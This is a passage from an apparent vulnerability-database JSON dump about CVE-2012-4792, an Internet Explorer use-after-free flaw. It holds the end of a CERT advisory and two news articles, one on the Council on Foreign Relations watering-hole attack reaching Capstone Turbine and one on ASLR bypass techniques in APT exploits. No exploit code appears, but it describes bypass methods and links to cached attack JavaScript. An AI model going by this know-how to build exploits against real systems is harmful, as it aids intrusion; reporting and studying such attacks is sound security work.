<http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/>\n * <http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html>\n * <http://labs.alienvault.com/labs/index.php/2012/just-another-water-hole-campaign-using-an-internet-explorer-0day>\n * <http://support.microsoft.com/kb/2458544>\n * <http://www.youtube.com/watch?v=28_LUs_g0u4>\n * <http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html#disable>\n\n### Acknowledgements\n\nThis vulnerability was described by Eric Romang and FireEye.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-4792](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4792>) \n---|--- \n**Date Public:** | 2012-12-28 \n**Date First Published:** | 2012-12-29 \n**Date Last Updated: ** | 2013-01-14 21:59 UTC \n**Document Revision: ** | 42 \n", "modified": "2013-01-14T21:59:00", "published": "2012-12-29T00:00:00", "id": "VU:154201", "href": "https://www.kb.cert.org/vuls/id/154201", "type": "cert", "title": "Microsoft Internet Explorer CButton use-after-free vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:27", "bulletinFamily": "info", "description": "[](<http://4.bp.blogspot.com/-N6kVGzv51Vo/UOQmpOx7p0I/AAAAAAAAQ8s/GkB-QlW_qk8/s1600/CFR+watering+hole+attack+also+target+Capstone+Turbine+Corporation.png>)Last week [Council on Foreign Relations website was compromised](<http://thehackernews.com/2012/12/chinese-hackers-exploiting-internet.html>) and recently hit by a drive-by attack using a zero day Internet Explorer 6 vulnerability for Cyber Espionage attack, suspected by Chinese Hackers. Later Microsoft confirmed that [Internet Explorer 6, 7, and 8 are vulnerable](<http://thehackernews.com/2012/12/internet-explorer-6-7-and-8-vulnerable.html>) to remote code execution hacks.\n\n \n\n\nAccording to researcher [Eric Romang](<http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/>), CFR watering hole attack (CVE-2012-4969 and CVE-2012-4792) has also target Capstone Turbine Corporation website since mid-September. He was able to find a [cached version of the first JavaScript](<http://pastebin.com/PuM8GMeb>) that starts the drive-by attack. Then on further search finds that by doing a Google dork search **_site:capstoneturbine.com \u201c_include\u201d_** we can see something strangely like CFR.org \u201cnews_14242aa.html\u201c file.\n\n \n\n\nCapstone Turbine Corporation is the world\u2019s leading producer of low-emission microturbine systems, and was first to market with commercially viable microturbine energy products. Capstone Turbine has shipped thousands of Capstone MicroTurbine systems to customers worldwide.\n\n \n\n\nJindrich Kubec director of Threat Intelligence at avast [confirm](<https://twitter.com/Jindroush/statuses/286268899010416640>) the presence of exploit in September on Capstone Turbine Corporation, \"_I wrote to Capstone Turbine on 19th Sep about the Flash exploit stuff they were hosting. They never replied. And also not fixed_\"\n\n \n\n\nEric shows many valid proofs from **_[urlQuery](<http://urlquery.net/report.php?id=551220>)_** and **_VirusTotal _**results that can confirm the presence of hacks on this new target and he suggest, \"_Potentially the guys behind CVE-2012-4969 and CVE-2012-4792 are the same_.\"\n\n \n\n\nFortunately, Microsoft have come up a patch and therefore the new year will be having a safe start after all.\n", "modified": "2013-01-11T18:02:27", "published": "2013-01-02T01:23:00", "id": "THN:5ACF233F4E37E6A4975B246F2082107C", "href": "http://thehackernews.com/2013/01/cfr-watering-hole-attack-also-target.html", "type": "thn", "title": "CFR watering hole attack also target Capstone Turbine Corporation", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:14", "bulletinFamily": "info", "description": "[](<http://2.bp.blogspot.com/-w3LwCzj4YXo/Ul6znjNKKPI/AAAAAAAAYHo/lX4eIOqgbds/s1600/ASLR+bypass+techniques+are+popular+with+APT+attacks.jpg>)\n\n[Address space layout randomization (ASLR)](<http://thehackernews.com/search/label/ASLR>) is a security technique involved in protection from buffer overflow attacks. Many recent [APT (Advanced Persistent Threat)](<http://thehackernews.com/search/label/APT>) attacks have utilized many different ASLR bypass techniques during the past year, according to Researchers at [FireEye](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/10/aslr-bypass-apocalypse-in-lately-zero-day-exploits.html>). \n \nMany exploits and malware attacks rely on the ability of the programmer to accurately identify where specific processes or system functions reside in memory. In order for an attacker to exploit or leverage a function, they must first be able to tell their code where to find the function or process to exploit. The [goal of ASLR](<http://thehackernews.com/2012/07/android-security-shielded-with-full.html>) is to introduce randomness into addresses used by a given task. It involves randomly arranging the positions of key data areas of a program, including the base of the executable and the positions of the stack, heap, and libraries, in a process's address space. \n\n \n\n\nToday a lot of attention is brought to client side exploits especially inside [web browsers](<http://thehackernews.com/search/label/web%20browser>). Normally the exploitation is done through the oldest known method of spraying the heap. \n \nAccording to Researchers, the easiest and most popular way to defeat ASLR protection is - loading a non-ASLR module. Such attacks were recently used in [Internet Explorer](<http://thehackernews.com/search/label/Internet%20Explorer>) (IE) Zero-Day Exploit CVE-2013-3893 and some other [vulnerabilities](<http://thehackernews.com/search/label/Vulnerability>) i.e. CVE2013-1347, CVE-2012-4969, CVE-2012-4792. \n \nBut there is a limitation that the non-ASLR module technique requires that IE 8 and IE 9 must be running with old software such as JRE 1.6, Office 2007/2010.\n\n \nAnother ASLR bypass technique involves the modification of the BSTR length/null terminator. But this technique only applies to specific types of vulnerabilities that can overwrite memory, such as buffer overflow, arbitrary memory write, and increasing/decreasing the content of a memory pointer. The Adobe XFA [0day exploit](<http://thehackernews.com/search/label/zero%20day>) (CVE-2013-0640) uses this technique to find the AcroForm.api base address and builds a ROP chain dynamically to bypass ASLR and [DEP](<http://thehackernews.com/search/label/DEP>). \n \n\"_The good thing about these types of vulnerabilities is that they can corrupt the length of a BSTR such that using the BSTR can access memory outside of its original boundaries. Such accesses may disclose memory addresses that can be used to pinpoint libraries suitable for ROP. Once the exploit has bypassed ASLR in this way, it may then use the same memory corruption bug to control EIP._\" \n \nAccording to Microsoft, these types of bugs typically use [JavaScript](<http://thehackernews.com/search/label/JavaScript%20code>) to trigger the flaw, as well as heap-spray to abuse the memory, and bypass ASLR. ASLR bypassing has become more and more common in Zero-Day attacks.\n", "modified": "2013-10-16T15:45:43", "published": "2013-10-16T04:42:00", "id": "THN:7ACF921BA3C582C8760C348FD2475BC2", "href": "http://thehackernews.com/2013/10/aslr-bypass-techniques-are-popular-with.html", "type": "thn", "title": "ASLR bypass techniques are popular with APT attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}